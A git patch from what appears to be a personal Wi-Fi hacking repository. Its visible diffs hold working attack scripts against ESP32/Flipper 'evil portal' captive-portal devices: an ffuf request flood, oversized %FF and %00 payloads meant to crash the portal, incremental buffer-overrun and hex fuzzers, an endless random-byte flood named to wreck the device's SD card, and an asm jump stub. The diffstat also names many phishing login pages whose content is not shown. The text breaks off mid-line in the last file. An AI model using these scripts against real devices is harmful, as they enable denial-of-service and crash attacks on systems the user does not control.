From 9fc3492c576b944f240f623ccf626e42a9e2f226 Mon Sep 17 00:00:00 2001 From: PrincessPi3 Date: Tue, 26 May 2026 21:24:00 -0600 Subject: [PATCH] migration --- .gitignore | 8 +- ASM-Payloads/asm-notes.txt | 0 ASM-Payloads/build-notes.txt | 0 ASM-Payloads/first.o | Bin ASM-Payloads/first.s | 0 ASM-Payloads/jx-addr.o | Bin ASM-Payloads/jx-addr.s | 18 +- ASM-Payloads/jx-addr2.o | Bin ASM-Payloads/second.o | Bin ASM-Payloads/second.o.txt | 0 ASM-Payloads/second.s | 0 ASM-Payloads/third.s | 0 README.md | 0 boofuzz-scripts/boofuzz-email-password.py | 0 evil-portal/evil-portal-crash | 46 +- evil-portal/evil-portal-crash.py | 36 +- evil-portal/evil-portal-sd-ruin | 46 +- evil-portal/hex-chars-fuzzing.py | 80 +-- evil-portal/hex-sniper-rifle.py | 86 +-- evil-portal/incremental-buff-overrun.py | 92 +-- evil-portal/sd-card-murder | 2 +- evil-portal/sd-card-murder.py | 58 +- evill-portal/evil-portal-crash | 23 + evill-portal/evil-portal-crash.py | 18 + evill-portal/evil-portal-sd-ruin | 23 + evill-portal/hex-chars-fuzzing.py | 40 ++ evill-portal/hex-sniper-rifle.py | 43 ++ evill-portal/incremental-buff-overrun.py | 46 ++ evill-portal/sd-card-murder | 1 + evill-portal/sd-card-murder.py | 29 + ffuf-curl-commands.txt | 0 marauder_cyd_microsd/AlaskaAirline.html | 89 +++ marauder_cyd_microsd/Amazon.html | 100 ++++ .../Better_Google_Mobile.html | 146 +++++ marauder_cyd_microsd/CoxWifi.html | 1 + marauder_cyd_microsd/Facebook.html | 83 +++ marauder_cyd_microsd/FakeHack.html | 61 ++ marauder_cyd_microsd/FakeHack2.html | 58 ++ marauder_cyd_microsd/Frequency.html | 71 +++ marauder_cyd_microsd/Google_Modern.html | 74 +++ marauder_cyd_microsd/Jet_Blue.html | 60 ++ marauder_cyd_microsd/Matrix.html | 139 +++++ marauder_cyd_microsd/Microsoft.html | 77 +++ marauder_cyd_microsd/Prank_Game.html | 76 +++ marauder_cyd_microsd/Spectrum.html | 91 +++ marauder_cyd_microsd/SpiritAirlines.html | 100 ++++ marauder_cyd_microsd/Starlink.html | 63 ++ marauder_cyd_microsd/T_Mobile.html | 94 +++ marauder_cyd_microsd/Twitch.html | 70 +++ marauder_cyd_microsd/Twitter.html | 2 + marauder_cyd_microsd/Verizon.html | 91 +++ marauder_cyd_microsd/american_airline.html | 116 ++++ marauder_cyd_microsd/ap.config.txt | 1 + marauder_cyd_microsd/apple.html | 279 +++++++++ marauder_cyd_microsd/at&t.html | 94 +++ marauder_cyd_microsd/detla_airline.html | 115 ++++ marauder_cyd_microsd/index.html | 1 + marauder_cyd_microsd/southwest_airline.html | 110 ++++ marauder_cyd_microsd/united_airline.html | 117 ++++ notes.txt | 0 pyenv.txt | 0 scapy/wifi-beacon-fuzz.py | 224 +++---- scapy/wifi-beacon-random-byte.py | 260 ++++---- scapy/wifi-beacon-scapy.py | 60 +- scapy/wifi-beacon-scapy2.py | 50 +- sd-card-helpers/dump-script | 23 + ...0-full-fuzz-100M-27092024-21.54.44-UTC.img | Bin ...run-nullbyte-32M-27092024-20.41.37-UTC.img | Bin sd-card-helpers/mount-marauder-sd | 6 + sd-card-helpers/umount-marauder-sd | 1 + sd-card-helpers/zero-recreate-sd | 45 ++ sd-card/dump-script | 58 +- sd-card/marauder_microsd/AlaskaAirline.html | 178 +++--- sd-card/marauder_microsd/Amazon.html | 198 +++---- .../Better_Google_Mobile.html | 290 ++++----- sd-card/marauder_microsd/CoxWifi.html | 0 sd-card/marauder_microsd/Facebook.html | 166 +++--- sd-card/marauder_microsd/FakeHack.html | 122 ++-- sd-card/marauder_microsd/FakeHack2.html | 116 ++-- sd-card/marauder_microsd/Frequency.html | 142 ++--- sd-card/marauder_microsd/Google_Modern.html | 148 ++--- sd-card/marauder_microsd/Jet_Blue.html | 120 ++-- sd-card/marauder_microsd/Matrix.html | 278 ++++----- sd-card/marauder_microsd/Microsoft.html | 154 ++--- sd-card/marauder_microsd/Prank_Game.html | 152 ++--- sd-card/marauder_microsd/Spectrum.html | 182 +++--- sd-card/marauder_microsd/SpiritAirlines.html | 200 +++---- sd-card/marauder_microsd/Starlink.html | 126 ++-- sd-card/marauder_microsd/T_Mobile.html | 188 +++--- sd-card/marauder_microsd/Twitch.html | 140 ++--- sd-card/marauder_microsd/Twitter.html | 4 +- sd-card/marauder_microsd/Verizon.html | 182 +++--- .../marauder_microsd/american_airline.html | 232 ++++---- sd-card/marauder_microsd/ap.config.txt | 2 +- sd-card/marauder_microsd/apple.html | 558 +++++++++--------- sd-card/marauder_microsd/at&t.html | 186 +++--- sd-card/marauder_microsd/detla_airline.html | 230 ++++---- sd-card/marauder_microsd/index.html | 2 +- .../marauder_microsd/southwest_airline.html | 220 +++---- sd-card/marauder_microsd/united_airline.html | 234 ++++---- sd-card/mount-marauder-sd | 12 +- sd-card/umount-marauder-sd | 2 +- sd-card/zero-recreate-sd | 90 +-- wifi-beacon-scapy.py | 25 + wifi-helpers/connect-wifi | 0 wifi-helpers/disconnect-wifi | 0 wifi-helpers/wifi-monitor | 0 107 files changed, 5691 insertions(+), 2989 deletions(-) mode change 100644 => 100755 .gitignore mode change 100644 => 100755 ASM-Payloads/asm-notes.txt mode change 100644 => 100755 ASM-Payloads/build-notes.txt mode change 100644 => 100755 ASM-Payloads/first.o mode change 100644 => 100755 ASM-Payloads/first.s mode change 100644 => 100755 ASM-Payloads/jx-addr.o mode change 100644 => 100755 ASM-Payloads/jx-addr.s mode change 100644 => 100755 ASM-Payloads/jx-addr2.o mode change 100644 => 100755 ASM-Payloads/second.o mode change 100644 => 100755 ASM-Payloads/second.o.txt mode change 100644 => 100755 ASM-Payloads/second.s mode change 100644 => 100755 ASM-Payloads/third.s mode change 100644 => 100755 README.md mode change 100644 => 100755 boofuzz-scripts/boofuzz-email-password.py mode change 100644 => 100755 evil-portal/evil-portal-crash mode change 100644 => 100755 evil-portal/evil-portal-crash.py mode change 100644 => 100755 evil-portal/evil-portal-sd-ruin mode change 100644 => 100755 evil-portal/hex-chars-fuzzing.py mode change 100644 => 100755 evil-portal/hex-sniper-rifle.py mode change 100644 => 100755 evil-portal/incremental-buff-overrun.py mode change 100644 => 100755 evil-portal/sd-card-murder mode change 100644 => 100755 evil-portal/sd-card-murder.py create mode 100755 evill-portal/evil-portal-crash create mode 100755 evill-portal/evil-portal-crash.py create mode 100755 evill-portal/evil-portal-sd-ruin create mode 100755 evill-portal/hex-chars-fuzzing.py create mode 100755 evill-portal/hex-sniper-rifle.py create mode 100755 evill-portal/incremental-buff-overrun.py create mode 100755 evill-portal/sd-card-murder create mode 100755 evill-portal/sd-card-murder.py mode change 100644 => 100755 ffuf-curl-commands.txt create mode 100755 marauder_cyd_microsd/AlaskaAirline.html create mode 100755 marauder_cyd_microsd/Amazon.html create mode 100755 marauder_cyd_microsd/Better_Google_Mobile.html create mode 100755 marauder_cyd_microsd/CoxWifi.html create mode 100755 marauder_cyd_microsd/Facebook.html create mode 100755 marauder_cyd_microsd/FakeHack.html create mode 100755 marauder_cyd_microsd/FakeHack2.html create mode 100755 marauder_cyd_microsd/Frequency.html create mode 100755 marauder_cyd_microsd/Google_Modern.html create mode 100755 marauder_cyd_microsd/Jet_Blue.html create mode 100755 marauder_cyd_microsd/Matrix.html create mode 100755 marauder_cyd_microsd/Microsoft.html create mode 100755 marauder_cyd_microsd/Prank_Game.html create mode 100755 marauder_cyd_microsd/Spectrum.html create mode 100755 marauder_cyd_microsd/SpiritAirlines.html create mode 100755 marauder_cyd_microsd/Starlink.html create mode 100755 marauder_cyd_microsd/T_Mobile.html create mode 100755 marauder_cyd_microsd/Twitch.html create mode 100755 marauder_cyd_microsd/Twitter.html create mode 100755 marauder_cyd_microsd/Verizon.html create mode 100755 marauder_cyd_microsd/american_airline.html create mode 100755 marauder_cyd_microsd/ap.config.txt create mode 100755 marauder_cyd_microsd/apple.html create mode 100755 marauder_cyd_microsd/at&t.html create mode 100755 marauder_cyd_microsd/detla_airline.html create mode 100755 marauder_cyd_microsd/index.html create mode 100755 marauder_cyd_microsd/southwest_airline.html create mode 100755 marauder_cyd_microsd/united_airline.html mode change 100644 => 100755 notes.txt mode change 100644 => 100755 pyenv.txt mode change 100644 => 100755 scapy/wifi-beacon-fuzz.py mode change 100644 => 100755 scapy/wifi-beacon-random-byte.py mode change 100644 => 100755 scapy/wifi-beacon-scapy.py mode change 100644 => 100755 scapy/wifi-beacon-scapy2.py create mode 100755 sd-card-helpers/dump-script mode change 100644 => 100755 sd-card-helpers/imgs/0-full-fuzz-100M-27092024-21.54.44-UTC.img mode change 100644 => 100755 sd-card-helpers/imgs/2-incremental-overrun-nullbyte-32M-27092024-20.41.37-UTC.img create mode 100755 sd-card-helpers/mount-marauder-sd create mode 100755 sd-card-helpers/umount-marauder-sd create mode 100755 sd-card-helpers/zero-recreate-sd mode change 100644 => 100755 sd-card/dump-script mode change 100644 => 100755 sd-card/marauder_microsd/AlaskaAirline.html mode change 100644 => 100755 sd-card/marauder_microsd/Amazon.html mode change 100644 => 100755 sd-card/marauder_microsd/Better_Google_Mobile.html mode change 100644 => 100755 sd-card/marauder_microsd/CoxWifi.html mode change 100644 => 100755 sd-card/marauder_microsd/Facebook.html mode change 100644 => 100755 sd-card/marauder_microsd/FakeHack.html mode change 100644 => 100755 sd-card/marauder_microsd/FakeHack2.html mode change 100644 => 100755 sd-card/marauder_microsd/Frequency.html mode change 100644 => 100755 sd-card/marauder_microsd/Google_Modern.html mode change 100644 => 100755 sd-card/marauder_microsd/Jet_Blue.html mode change 100644 => 100755 sd-card/marauder_microsd/Matrix.html mode change 100644 => 100755 sd-card/marauder_microsd/Microsoft.html mode change 100644 => 100755 sd-card/marauder_microsd/Prank_Game.html mode change 100644 => 100755 sd-card/marauder_microsd/Spectrum.html mode change 100644 => 100755 sd-card/marauder_microsd/SpiritAirlines.html mode change 100644 => 100755 sd-card/marauder_microsd/Starlink.html mode change 100644 => 100755 sd-card/marauder_microsd/T_Mobile.html mode change 100644 => 100755 sd-card/marauder_microsd/Twitch.html mode change 100644 => 100755 sd-card/marauder_microsd/Twitter.html mode change 100644 => 100755 sd-card/marauder_microsd/Verizon.html mode change 100644 => 100755 sd-card/marauder_microsd/american_airline.html mode change 100644 => 100755 sd-card/marauder_microsd/ap.config.txt mode change 100644 => 100755 sd-card/marauder_microsd/apple.html mode change 100644 => 100755 sd-card/marauder_microsd/at&t.html mode change 100644 => 100755 sd-card/marauder_microsd/detla_airline.html mode change 100644 => 100755 sd-card/marauder_microsd/index.html mode change 100644 => 100755 sd-card/marauder_microsd/southwest_airline.html mode change 100644 => 100755 sd-card/marauder_microsd/united_airline.html mode change 100644 => 100755 sd-card/mount-marauder-sd mode change 100644 => 100755 sd-card/umount-marauder-sd mode change 100644 => 100755 sd-card/zero-recreate-sd create mode 100755 wifi-beacon-scapy.py mode change 100644 => 100755 wifi-helpers/connect-wifi mode change 100644 => 100755 wifi-helpers/disconnect-wifi mode change 100644 => 100755 wifi-helpers/wifi-monitor diff --git a/.gitignore b/.gitignore old mode 100644 new mode 100755 index 918db1b..35a6956 --- a/.gitignore +++ b/.gitignore @@ -1,4 +1,4 @@ -private-notes.txt -boofuzz -old -imgs +private-notes.txt +boofuzz +old +imgs diff --git a/ASM-Payloads/asm-notes.txt b/ASM-Payloads/asm-notes.txt old mode 100644 new mode 100755 diff --git a/ASM-Payloads/build-notes.txt b/ASM-Payloads/build-notes.txt old mode 100644 new mode 100755 diff --git a/ASM-Payloads/first.o b/ASM-Payloads/first.o old mode 100644 new mode 100755 diff --git a/ASM-Payloads/first.s b/ASM-Payloads/first.s old mode 100644 new mode 100755 diff --git a/ASM-Payloads/jx-addr.o b/ASM-Payloads/jx-addr.o old mode 100644 new mode 100755 diff --git a/ASM-Payloads/jx-addr.s b/ASM-Payloads/jx-addr.s old mode 100644 new mode 100755 index 382d957..fa18fe4 --- a/ASM-Payloads/jx-addr.s +++ b/ASM-Payloads/jx-addr.s @@ -1,9 +1,9 @@ -_start: - nop - nop - nop - l32r a2, 400011a0 - jx a2 - nop - nop - nop +_start: + nop + nop + nop + l32r a2, 400011a0 + jx a2 + nop + nop + nop diff --git a/ASM-Payloads/jx-addr2.o b/ASM-Payloads/jx-addr2.o old mode 100644 new mode 100755 diff --git a/ASM-Payloads/second.o b/ASM-Payloads/second.o old mode 100644 new mode 100755 diff --git a/ASM-Payloads/second.o.txt b/ASM-Payloads/second.o.txt old mode 100644 new mode 100755 diff --git a/ASM-Payloads/second.s b/ASM-Payloads/second.s old mode 100644 new mode 100755 diff --git a/ASM-Payloads/third.s b/ASM-Payloads/third.s old mode 100644 new mode 100755 diff --git a/README.md b/README.md old mode 100644 new mode 100755 diff --git a/boofuzz-scripts/boofuzz-email-password.py b/boofuzz-scripts/boofuzz-email-password.py old mode 100644 new mode 100755 diff --git a/evil-portal/evil-portal-crash b/evil-portal/evil-portal-crash old mode 100644 new mode 100755 index bb2525f..a58f819 --- a/evil-portal/evil-portal-crash +++ b/evil-portal/evil-portal-crash @@ -1,23 +1,23 @@ -#!/bin/bash -wifi_device=wlan1 -ssid=Guest-WiFi -host="192.168.4.1" - -wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt - -sudo nmcli d disconnect $wifi_device > /dev/null - -sudo nmcli dev wifi rescan > /dev/null - -echo -e "\nCashing This Evil Portal With No Survivors\n" - -sudo nmcli device wifi connect $ssid ifname $wifi_device - -echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n" - -ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3 - -echo -e "\n\nPinging To Confirm Kill...\n" -ping -c 4 $host - -echo -e "\nThat Was Big Payload (4U)\nRIP" +#!/bin/bash +wifi_device=wlan1 +ssid=Guest-WiFi +host="192.168.4.1" + +wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt + +sudo nmcli d disconnect $wifi_device > /dev/null + +sudo nmcli dev wifi rescan > /dev/null + +echo -e "\nCashing This Evil Portal With No Survivors\n" + +sudo nmcli device wifi connect $ssid ifname $wifi_device + +echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n" + +ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3 + +echo -e "\n\nPinging To Confirm Kill...\n" +ping -c 4 $host + +echo -e "\nThat Was Big Payload (4U)\nRIP" diff --git a/evil-portal/evil-portal-crash.py b/evil-portal/evil-portal-crash.py old mode 100644 new mode 100755 index f6c4df0..cb0436f --- a/evil-portal/evil-portal-crash.py +++ b/evil-portal/evil-portal-crash.py @@ -1,18 +1,18 @@ -import subprocess - -# host = "http://192.168.4.1" -host = "http://10.0.0.80" -charlen = 2000 -char = "%FF" - -curl_cmd = "curl --silent" - -payload = char*charlen -uri = f"{host}/get.php?email={payload}&password={payload}" -command = f"{curl_cmd} '{uri}'" -print(f"\nCrashing This Evil Portal With No Survivors Using: {charlen} {char}s\n") -p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) -(output, err) = p.communicate() -p_status = p.wait() - -print("That's A Big Load (4U)\n\nDone") +import subprocess + +# host = "http://192.168.4.1" +host = "http://10.0.0.80" +charlen = 2000 +char = "%FF" + +curl_cmd = "curl --silent" + +payload = char*charlen +uri = f"{host}/get.php?email={payload}&password={payload}" +command = f"{curl_cmd} '{uri}'" +print(f"\nCrashing This Evil Portal With No Survivors Using: {charlen} {char}s\n") +p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) +(output, err) = p.communicate() +p_status = p.wait() + +print("That's A Big Load (4U)\n\nDone") diff --git a/evil-portal/evil-portal-sd-ruin b/evil-portal/evil-portal-sd-ruin old mode 100644 new mode 100755 index bb2525f..a58f819 --- a/evil-portal/evil-portal-sd-ruin +++ b/evil-portal/evil-portal-sd-ruin @@ -1,23 +1,23 @@ -#!/bin/bash -wifi_device=wlan1 -ssid=Guest-WiFi -host="192.168.4.1" - -wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt - -sudo nmcli d disconnect $wifi_device > /dev/null - -sudo nmcli dev wifi rescan > /dev/null - -echo -e "\nCashing This Evil Portal With No Survivors\n" - -sudo nmcli device wifi connect $ssid ifname $wifi_device - -echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n" - -ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3 - -echo -e "\n\nPinging To Confirm Kill...\n" -ping -c 4 $host - -echo -e "\nThat Was Big Payload (4U)\nRIP" +#!/bin/bash +wifi_device=wlan1 +ssid=Guest-WiFi +host="192.168.4.1" + +wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt + +sudo nmcli d disconnect $wifi_device > /dev/null + +sudo nmcli dev wifi rescan > /dev/null + +echo -e "\nCashing This Evil Portal With No Survivors\n" + +sudo nmcli device wifi connect $ssid ifname $wifi_device + +echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n" + +ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3 + +echo -e "\n\nPinging To Confirm Kill...\n" +ping -c 4 $host + +echo -e "\nThat Was Big Payload (4U)\nRIP" diff --git a/evil-portal/hex-chars-fuzzing.py b/evil-portal/hex-chars-fuzzing.py old mode 100644 new mode 100755 index 331795a..ef475ff --- a/evil-portal/hex-chars-fuzzing.py +++ b/evil-portal/hex-chars-fuzzing.py @@ -1,40 +1,40 @@ -import datetime -import subprocess -import time - -# host = "10.0.0.80" -host = "192.168.4.1" - -rangei = 65536 # FFFF+1 - -currenttime = datetime.datetime.now() -datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S") - -for x in range(rangei): - hexcode = hex(x)[2:] - if x > 255: - urlformatted_raw = "%{:04x}".format(x) - hexformatted_raw = "0x{:04x}".format(x) - urlformatted = f"{urlformatted_raw[:3]}%{urlformatted_raw[3:]}" - else: - urlformatted_raw = "%{:04x}".format(x) - urlformatted = "%{:02x}".format(x) - hexformatted = "0x{:02x}".format(x) - unicode_formatted = "%u{:04x}".format(x) - printformatted = f"\\x{hexcode}" - - print(f"Running {urlformatted} and {urlformatted_raw} and {unicode_formatted}") - p = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted}email&password=password{urlformatted}password' >> fuzzing-results/urlformatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True) - p1 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted_raw}email&password=password{urlformatted_raw}password' >> fuzzing-results/urlformatted_raw-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True) - p2 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{unicode_formatted}email&password=password{unicode_formatted}password' >> fuzzing-results/unicode_formatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True) - - (output, err) = p.communicate() - (output, err) = p1.communicate() - (output, err) = p2.communicate() - - p_status = p.wait() - p_status1 = p1.wait() - p_status2 = p2.wait() - - time.sleep(0.225) -print(f"\n\nlog written to fuzzing-results/X-{rangei}-{datestamp}.txt") +import datetime +import subprocess +import time + +# host = "10.0.0.80" +host = "192.168.4.1" + +rangei = 65536 # FFFF+1 + +currenttime = datetime.datetime.now() +datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S") + +for x in range(rangei): + hexcode = hex(x)[2:] + if x > 255: + urlformatted_raw = "%{:04x}".format(x) + hexformatted_raw = "0x{:04x}".format(x) + urlformatted = f"{urlformatted_raw[:3]}%{urlformatted_raw[3:]}" + else: + urlformatted_raw = "%{:04x}".format(x) + urlformatted = "%{:02x}".format(x) + hexformatted = "0x{:02x}".format(x) + unicode_formatted = "%u{:04x}".format(x) + printformatted = f"\\x{hexcode}" + + print(f"Running {urlformatted} and {urlformatted_raw} and {unicode_formatted}") + p = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted}email&password=password{urlformatted}password' >> fuzzing-results/urlformatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True) + p1 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{urlformatted_raw}email&password=password{urlformatted_raw}password' >> fuzzing-results/urlformatted_raw-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True) + p2 = subprocess.Popen(f"curl -i -s -S 'http://{host}/get?email=email{unicode_formatted}email&password=password{unicode_formatted}password' >> fuzzing-results/unicode_formatted-{rangei}-{datestamp}.txt", stdout=subprocess.PIPE, shell=True) + + (output, err) = p.communicate() + (output, err) = p1.communicate() + (output, err) = p2.communicate() + + p_status = p.wait() + p_status1 = p1.wait() + p_status2 = p2.wait() + + time.sleep(0.225) +print(f"\n\nlog written to fuzzing-results/X-{rangei}-{datestamp}.txt") diff --git a/evil-portal/hex-sniper-rifle.py b/evil-portal/hex-sniper-rifle.py old mode 100644 new mode 100755 index fbee616..8cd78c6 --- a/evil-portal/hex-sniper-rifle.py +++ b/evil-portal/hex-sniper-rifle.py @@ -1,43 +1,43 @@ -import datetime -import subprocess -import time - -# host = "http://10.0.0.80" -# host = "http://192.168.4.1" -host = "http://172.0.0.1" -charlen = 750 -char = "%00%FF" -prepend = "" -append = "" - -currenttime = datetime.datetime.now() -datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S") - -outfile = f"fuzzing-results/hex-sniper-rifle-{datestamp}.txt" - -# -i, --include - include header in output -# -I, --head - HEAD http method -# -s, --silent - supresses progress and errors -# -S, --show-error - when used with -s/--silent, displays errors -# -D , --dump-header - saves response headers to -# -f, --fail - fail silently on HTTP error -# -X, --request - request method, defaults to GET -# -H , --header - sets header, multiple are allowed -# -v, --verbose - show request headers -# -o , --output - write output to file - -# curl_cmd = "curl -i -s -S -v" -curl_cmd = "curl --include --silent --show-error" - -chars = char*charlen -payload = f"{prepend}{chars}{append}" -uri = f"{host}/get.php?email={payload}&password=holdstill" -command = f"{curl_cmd} '{uri}' >> {outfile}" -print(f"\n\nRunning {char}*{charlen} on email\nPrepend: {prepend}\nAppend: {append}\nOutfile: {outfile}") -with open(outfile, "a") as log: - log.write(f"\n\nChars: {char}*{charlen} - Prepend: {prepend} - Append: {append}\n") -p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) -(output, err) = p.communicate() -p_status = p.wait() - -print(f"\n\nlog written to {outfile}") +import datetime +import subprocess +import time + +# host = "http://10.0.0.80" +# host = "http://192.168.4.1" +host = "http://172.0.0.1" +charlen = 750 +char = "%00%FF" +prepend = "" +append = "" + +currenttime = datetime.datetime.now() +datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S") + +outfile = f"fuzzing-results/hex-sniper-rifle-{datestamp}.txt" + +# -i, --include - include header in output +# -I, --head - HEAD http method +# -s, --silent - supresses progress and errors +# -S, --show-error - when used with -s/--silent, displays errors +# -D , --dump-header - saves response headers to +# -f, --fail - fail silently on HTTP error +# -X, --request - request method, defaults to GET +# -H , --header - sets header, multiple are allowed +# -v, --verbose - show request headers +# -o , --output - write output to file + +# curl_cmd = "curl -i -s -S -v" +curl_cmd = "curl --include --silent --show-error" + +chars = char*charlen +payload = f"{prepend}{chars}{append}" +uri = f"{host}/get.php?email={payload}&password=holdstill" +command = f"{curl_cmd} '{uri}' >> {outfile}" +print(f"\n\nRunning {char}*{charlen} on email\nPrepend: {prepend}\nAppend: {append}\nOutfile: {outfile}") +with open(outfile, "a") as log: + log.write(f"\n\nChars: {char}*{charlen} - Prepend: {prepend} - Append: {append}\n") +p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) +(output, err) = p.communicate() +p_status = p.wait() + +print(f"\n\nlog written to {outfile}") diff --git a/evil-portal/incremental-buff-overrun.py b/evil-portal/incremental-buff-overrun.py old mode 100644 new mode 100755 index 97072e3..078da1e --- a/evil-portal/incremental-buff-overrun.py +++ b/evil-portal/incremental-buff-overrun.py @@ -1,46 +1,46 @@ -import datetime -import subprocess -import time - -# host = "http://10.0.0.80" -# host = "http://192.168.4.1" -host = "http://172.0.0.1" -rangei = 10000 -char = "%00%FF" -# char = "%00" -prepend = "" -append = "" -#append = "%0a%00%0a" - -currenttime = datetime.datetime.now() -datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S") - -outfile = f"fuzzing-results/chars-{rangei}-{datestamp}.txt" - -# -i, --include - include header in output -# -I, --head - HEAD http method -# -s, --silent - supresses progress and errors -# -S, --show-error - when used with -s/--silent, displays errors -# -D , --dump-header - saves response headers to -# -f, --fail - fail silently on HTTP error -# -X, --request - request method, defaults to GET -# -H , --header - sets header, multiple are allowed -# -v, --verbose - show request headers -# -o , --output - write output to file - -# curl_cmd = "curl -i -s -S -v" -curl_cmd = "curl --include --silent --show-error" - -for x in range(rangei+1): - chars = char*x - payload = f"{prepend}{chars}{append}" - uri = f"{host}/get?email={payload}&password={payload}" - command = f"{curl_cmd} '{uri}' >> {outfile}" - print(f"Running {x}/{rangei} chars ({char})\n\tPrepend: {prepend}\n\tAppend: {append}\nOutfile: {outfile}\n") - with open(outfile, "a") as log: - log.write(f"\n\n{x}/{rangei} - Char: {char} - Prepend: {prepend} - Append: {append}\n") - p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) - (output, err) = p.communicate() - p_status = p.wait() - -print(f"\n\nlog written to {outfile}") +import datetime +import subprocess +import time + +# host = "http://10.0.0.80" +# host = "http://192.168.4.1" +host = "http://172.0.0.1" +rangei = 10000 +char = "%00%FF" +# char = "%00" +prepend = "" +append = "" +#append = "%0a%00%0a" + +currenttime = datetime.datetime.now() +datestamp = currenttime.strftime("%d%m%Y-%H.%M.%S") + +outfile = f"fuzzing-results/chars-{rangei}-{datestamp}.txt" + +# -i, --include - include header in output +# -I, --head - HEAD http method +# -s, --silent - supresses progress and errors +# -S, --show-error - when used with -s/--silent, displays errors +# -D , --dump-header - saves response headers to +# -f, --fail - fail silently on HTTP error +# -X, --request - request method, defaults to GET +# -H , --header - sets header, multiple are allowed +# -v, --verbose - show request headers +# -o , --output - write output to file + +# curl_cmd = "curl -i -s -S -v" +curl_cmd = "curl --include --silent --show-error" + +for x in range(rangei+1): + chars = char*x + payload = f"{prepend}{chars}{append}" + uri = f"{host}/get?email={payload}&password={payload}" + command = f"{curl_cmd} '{uri}' >> {outfile}" + print(f"Running {x}/{rangei} chars ({char})\n\tPrepend: {prepend}\n\tAppend: {append}\nOutfile: {outfile}\n") + with open(outfile, "a") as log: + log.write(f"\n\n{x}/{rangei} - Char: {char} - Prepend: {prepend} - Append: {append}\n") + p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) + (output, err) = p.communicate() + p_status = p.wait() + +print(f"\n\nlog written to {outfile}") diff --git a/evil-portal/sd-card-murder b/evil-portal/sd-card-murder old mode 100644 new mode 100755 index dadd117..e39fddf --- a/evil-portal/sd-card-murder +++ b/evil-portal/sd-card-murder @@ -1 +1 @@ -bash connect-wifi && python sd-card-murder.py +bash connect-wifi && python sd-card-murder.py diff --git a/evil-portal/sd-card-murder.py b/evil-portal/sd-card-murder.py old mode 100644 new mode 100755 index 6060174..f607c24 --- a/evil-portal/sd-card-murder.py +++ b/evil-portal/sd-card-murder.py @@ -1,29 +1,29 @@ -import subprocess -import os -# from requests.utils import requote_uri -import urllib.parse -from random import randbytes - -# host = "http://192.168.4.1" # cyd version -host = "http://172.0.0.1" # flipper version -# host = "http://10.0.0.80" -# rangei = 10000 -# charlen = 2012 # to crash -charlen = 1400 # to flood flipper mem(?) -# charlen = 700 # to flood filesysted -curl_cmd = "curl --include --silent --show-error" - -x = 0 -#for x in range(rangei+1): -while True: - payload = urllib.parse.quote(randbytes(charlen)) - uri = f"{host}/get?email={payload}&password={payload}" - command = f"{curl_cmd} '{uri}'" - - print(f"{x} of infinite sets of {charlen} random bytes") - p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) - (output, err) = p.communicate() - p_status = p.wait() - x=x+1 - -print(f"\n\nThe End") +import subprocess +import os +# from requests.utils import requote_uri +import urllib.parse +from random import randbytes + +# host = "http://192.168.4.1" # cyd version +host = "http://172.0.0.1" # flipper version +# host = "http://10.0.0.80" +# rangei = 10000 +# charlen = 2012 # to crash +charlen = 1400 # to flood flipper mem(?) +# charlen = 700 # to flood filesysted +curl_cmd = "curl --include --silent --show-error" + +x = 0 +#for x in range(rangei+1): +while True: + payload = urllib.parse.quote(randbytes(charlen)) + uri = f"{host}/get?email={payload}&password={payload}" + command = f"{curl_cmd} '{uri}'" + + print(f"{x} of infinite sets of {charlen} random bytes") + p = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True) + (output, err) = p.communicate() + p_status = p.wait() + x=x+1 + +print(f"\n\nThe End") diff --git a/evill-portal/evil-portal-crash b/evill-portal/evil-portal-crash new file mode 100755 index 0000000..bb2525f --- /dev/null +++ b/evill-portal/evil-portal-crash @@ -0,0 +1,23 @@ +#!/bin/bash +wifi_device=wlan1 +ssid=Guest-WiFi +host="192.168.4.1" + +wordlist=/usr/share/wordlists/seclists/Fuzzing/6-digits-000000-999999.txt + +sudo nmcli d disconnect $wifi_device > /dev/null + +sudo nmcli dev wifi rescan > /dev/null + +echo -e "\nCashing This Evil Portal With No Survivors\n" + +sudo nmcli device wifi connect $ssid ifname $wifi_device + +echo -e "\nSending Over 9000 Requests...\nSpamming Until It Errors\n" + +ffuf -w $wordlist -u "http://${host}/get?email=FUZZ&password=FUZZ" -fc all -s -sa -t 256 -timeout 3 + +echo -e "\n\nPinging To 